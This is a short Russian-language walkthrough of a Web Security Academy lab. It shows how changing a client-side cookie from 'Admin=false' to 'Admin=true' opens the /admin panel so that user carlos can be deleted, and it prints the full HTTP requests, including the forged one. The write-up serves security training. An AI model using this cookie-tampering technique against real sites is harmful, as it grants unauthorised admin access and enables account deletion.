В данной лабе есть админ панель в поддиректории /admin. Для прохождения нужно удалить пользователя carlos. У нас есть свой аккаунт с кредами wiener:peter.
https://0a7400940427e73e81239e93008800d6.web-security-academy.net/
Solution
Так как у нас креды, было бы глупо не войти в наш аккаунт.
В url нашего профиля https://0a7400940427e73e81239e93008800d6.web-security-academy.net/my-account?id=wiener мы можем увидеть GET-параметр my-account.
Можно попробовать указать другое имя аккаунта. Например, carlos. И это не сработало :(
Можно посмотреть HTTP-запрос, который мы отправляем для получения страницы:
GET /my-account HTTP/2
Host: 0a7400940427e73e81239e93008800d6.web-security-academy.net
Cookie: session=Vy6WXmcR6UmR0et3TlDj5mwYWF2Xy5f4; Admin=false
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0a7400940427e73e81239e93008800d6.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Мы можем увидеть, что в запросе нам установилось Cookie: Admin со значением false. Конечно же поменяем его на True.
Попробуем таким же образом зайти в панель администратора:
GET /admin HTTP/2
Host: 0a7400940427e73e81239e93008800d6.web-security-academy.net
Cookie: session=eRLogJbzgvCOwyqgzja8CRmzduJ8L2Dl; Admin=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Успех) Теперь просто удалим пользователя.
